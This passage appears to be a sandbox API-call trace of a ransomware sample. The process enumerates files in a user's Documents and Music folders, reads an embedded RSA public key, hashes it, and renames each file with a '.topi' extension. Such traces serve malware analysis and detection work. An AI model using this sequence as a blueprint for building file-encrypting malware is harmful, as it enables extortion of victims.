ftCreationTime.dwLowDateTime=0xd2301d20, ftCreationTime.dwHighDateTime=0x1d5bcc7, ftLastAccessTime.dwLowDateTime=0xdff80de0, ftLastAccessTime.dwHighDateTime=0x1d5bea3, ftLastWriteTime.dwLowDateTime=0xdff80de0, ftLastWriteTime.dwHighDateTime=0x1d5bea3, nFileSizeHigh=0x0, nFileSizeLow=0x7cbb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7-uOd0zQyylzINLmT.csv", cAlternateFileName="7-UOD0~1.CSV")) returned 1 [0097.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xee) returned 0x9a03438 [0097.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.603] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\p6Wk0rU_y\\7-uOd0zQyylzINLmT.csv") returned=".csv" [0097.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\p6Wk0rU_y\\7-uOd0zQyylzINLmT.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\p6wk0ru_y\\7-uod0zqyylzinlmt.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.603] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=31931) returned 1 [0097.603] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.606] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x7c95, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.606] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.607] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.607] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.607] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x7cbb, lpOverlapped=0x0) returned 1 [0097.607] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.607] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.607] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.607] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.607] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df338) returned 1 [0097.608] CryptCreateHash (in: hProv=0x6df338, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.608] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.608] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.608] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.608] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.608] GetLastError () returned 0x0 [0097.609] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.609] CryptReleaseContext (hProv=0x6df338, dwFlags=0x0) returned 1 [0097.609] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.609] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.609] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.609] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.609] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.609] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.609] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7cc0) returned 0x9a06a00 [0097.609] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.609] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.610] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\p6Wk0rU_y\\7-uOd0zQyylzINLmT.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\p6wk0ru_y\\7-uod0zqyylzinlmt.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\p6Wk0rU_y\\7-uOd0zQyylzINLmT.csv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\p6wk0ru_y\\7-uod0zqyylzinlmt.csv.topi")) returned 1 [0097.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.611] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.612] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.612] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2301d20, ftCreationTime.dwHighDateTime=0x1d5bcc7, ftLastAccessTime.dwLowDateTime=0xdff80de0, ftLastAccessTime.dwHighDateTime=0x1d5bea3, ftLastWriteTime.dwLowDateTime=0xdff80de0, ftLastWriteTime.dwHighDateTime=0x1d5bea3, nFileSizeHigh=0x0, nFileSizeLow=0x7cbb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7-uOd0zQyylzINLmT.csv", cAlternateFileName="7-UOD0~1.CSV")) returned 0 [0097.612] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.612] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.612] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.613] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.613] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\") returned="PruBsWuwCDlLwiCR\\" [0097.613] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\") returned="-u63kcF\\" [0097.613] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\") returned="44M5AK\\" [0097.613] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0097.613] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.613] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.613] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.613] PathFindFileNameW (pszPath="") returned="" [0097.614] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\7akSZQOCvEwD.m4a") returned=".m4a" [0097.614] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\7akSZQOCvEwD.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\prubswuwcdllwicr\\7akszqocvewd.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.614] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=27010) returned 1 [0097.614] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.617] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x695c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.617] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.618] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.619] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.619] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.619] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.619] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.619] GetLastError () returned 0x0 [0097.619] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.619] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.619] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.619] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.619] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6980) returned 0x9a06a00 [0097.620] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb728 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4eb0 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb770 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ec8 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ef8 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f10 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.620] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ef8 | out: hHeap=0x680000) returned 1 [0097.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f10 | out: hHeap=0x680000) returned 1 [0097.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4f10 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4ef8 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f10 | out: hHeap=0x680000) returned 1 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ef8 | out: hHeap=0x680000) returned 1 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.621] GetCurrentThreadId () returned 0x8c4 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9e30 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.621] GetCurrentThreadId () returned 0x8c4 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ef8 [0097.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f10 [0097.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ee0 [0097.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4f28 [0097.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0097.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ef8 | out: hHeap=0x680000) returned 1 [0097.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ef8 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.623] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 